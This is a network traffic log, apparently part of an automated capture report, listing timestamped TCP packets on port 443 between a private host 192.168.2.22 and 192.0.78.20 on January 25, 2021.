Jan 25, 2021 20:12:30.237426996 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.246961117 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.246990919 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.247056007 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.247818947 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.247838974 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.247879028 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.248573065 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.248590946 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.248630047 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.249949932 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.249972105 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.250021935 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.250382900 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.250410080 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.250447035 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.251311064 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.251342058 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.251372099 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.252623081 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.252645969 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.252684116 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.253006935 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.253026009 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.253066063 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.281371117 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.281413078 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.281433105 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.281501055 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.281713009 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.281737089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.281768084 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.282516003 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.282542944 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.282581091 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.283318043 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.283339977 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.283387899 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.284132004 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.284154892 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.284178972 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.284188986 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.284205914 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.284276009 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.284910917 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.284930944 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.284979105 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.285696983 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.285716057 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.285764933 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.286500931 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.286516905 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.286556959 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.287358046 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.287377119 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.287422895 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.287930965 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.287949085 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.287990093 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.288563013 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.288580894 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.288615942 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.289201975 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.289221048 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.289237976 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.289273977 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.290124893 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.290144920 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.290160894 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.290189028 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.290955067 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.290973902 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.290991068 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.291008949 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.291874886 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.291894913 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.291910887 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.291933060 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.292726040 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.292746067 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.292764902 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.292772055 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.292828083 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.293595076 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.293613911 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.293629885 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.293646097 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.294465065 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.294482946 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.294500113 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.294529915 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.295334101 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.295356035 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.295375109 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.295382977 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.295407057 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.296215057 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.296233892 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.296253920 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.296263933 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.297070980 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.297087908 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.297105074 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.297142029 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.297950983 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.297969103 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.297987938 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.298007011 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.298847914 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.298866987 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.298882961 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.298918962 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.322611094 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.322639942 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.322658062 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.322750092 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.322921038 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.322979927 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.323009014 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.323030949 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.323031902 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.323065996 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.323868036 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.323887110 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.323899031 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.323925972 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.324775934 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.324795961 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.324811935 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.324845076 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.325803995 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.325823069 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.325838089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.325862885 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.326437950 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.326455116 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.326472044 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.326488972 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.327370882 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.327389002 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.327408075 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.327442884 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.327470064 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.328207970 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.328227043 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.328242064 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.328269005 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.329092979 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.329112053 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.329123974 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.329164028 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.329979897 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.329998970 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.330014944 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.330039978 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.330058098 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.330845118 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.330863953 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.330881119 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.330898046 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.331690073 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.331708908 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.331723928 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.331756115 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.332590103 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.332607031 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.332623005 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.332638025 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.333446980 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.333463907 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.333482981 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.333497047 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.333514929 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.334350109 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.334369898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.334383011 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.334410906 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.335205078 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.335226059 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.335242033 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.335264921 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.336071968 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.336090088 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.336107969 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.336117029 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.336142063 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.336950064 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.336968899 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.337033033 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.347723007 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347745895 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347764969 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347783089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347799063 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347815990 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347836018 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347852945 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.347856045 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347878933 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347881079 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.347897053 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347909927 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347922087 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.347970963 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.347990990 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.348483086 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.348500967 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.348517895 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.348536015 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.348543882 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.348572969 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.349324942 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.349343061 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.349355936 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.349400997 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.350183010 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.350199938 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.350214958 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.350261927 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.350953102 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.350977898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.350995064 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.351002932 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.351027012 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.351835012 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.351852894 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.351867914 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.351917028 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.352596998 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.352615118 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.352629900 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.352665901 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.353480101 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.353497982 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.353513956 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.353543997 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.354293108 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.354310989 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.354322910 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.354361057 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.355094910 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.355112076 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.355127096 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.355163097 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.355907917 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.355928898 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.355951071 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.355952978 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.355983973 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.356765985 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.356785059 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.356800079 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.356825113 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.357557058 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.357575893 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.357590914 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.357609987 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.358388901 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.358447075 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.373970032 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.373992920 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374008894 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374025106 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374120951 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.374275923 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374293089 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374310017 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374326944 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.374330044 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.374368906 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.375139952 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.375159979 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.375176907 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.375195026 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.375197887 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.375237942 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.375965118 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.375983953 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.375998974 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.376014948 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.376032114 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.376051903 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.376831055 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.376851082 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.376867056 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.376883030 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.376902103 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.376920938 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.377363920 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.377684116 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.377701998 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.377717018 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.377734900 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.377762079 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.377779961 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.378464937 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.378482103 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.378499031 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.378518105 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.378530025 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.378542900 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.379287958 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.379306078 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.379322052 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.379339933 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.379349947 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.379373074 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.379568100 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.380112886 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380131006 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380146980 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380163908 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380196095 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.380939007 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380956888 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380971909 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.380994081 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.381011009 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.381031990 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.381794930 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.381814957 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.381830931 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.381860018 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.381859064 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.381905079 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.382257938 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.382592916 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.382613897 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.382631063 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.382647038 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.382662058 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.382682085 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.383426905 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.383444071 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.383493900 CET	49169	443	192.168.2.22	192.0.78.20
Jan 25, 2021 20:12:30.398936987 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.398961067 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.398972034 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.398984909 CET	443	49169	192.0.78.20	192.168.2.22
Jan 25, 2021 20:12:30.398997068 CET	443	49169	192.0.78.20	192.168.2.22
